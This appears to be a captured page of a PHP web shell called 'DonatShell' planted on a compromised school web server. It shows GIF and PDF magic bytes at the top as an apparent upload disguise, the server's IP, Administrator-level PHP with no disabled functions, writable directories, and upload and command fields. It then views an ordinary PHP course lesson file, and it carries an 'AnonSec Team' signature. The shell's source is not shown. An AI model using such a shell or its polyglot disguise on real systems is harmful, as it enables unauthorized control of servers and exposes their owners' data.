GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1145/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1145/_Archive/Lesson03.php
<?
// Lesson03.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');
$title = "Lesson 3: PHP and Creating Dynamic Web Sites";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>
<p>
<fieldset><legend>Description</legend>
Begin an understanding of what makes up a PHP web page and how they work.

</fieldset>

<fieldset class="pio"><legend>Personalized Instruction</legend>
<ol start="1" class="pio">
  <li>Read Chapter 1 <i>Introduction to PHP</i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li>
  <li>Read Chapter 2 <i>Programming with PHP</i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li>
  <li>Read Chapter 3 <i>Creating Dynamic Web Sites</i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li>
</ol>
</fieldset>

<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="25">
	<!-- Chapter 3: Create Dynamic Web Sites 25 -->
	<li>Include Files.</li>
	<li>Make Sticky Forms.</li>
	<li>Create and Call Functions.</li>
	<li>Understand Variable Scope.</li>
	<li>Use Date and Time Functions.</li>
	<li>Send Email.</li>
</ol>
</fieldset>

<fieldset><legend>Evaluations</legend>
There are no formal evaluations for this lesson.
</fieldset>

<?
$thisFile=__FILE__; $thisLine=__LINE__; include('ReferencesResources.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team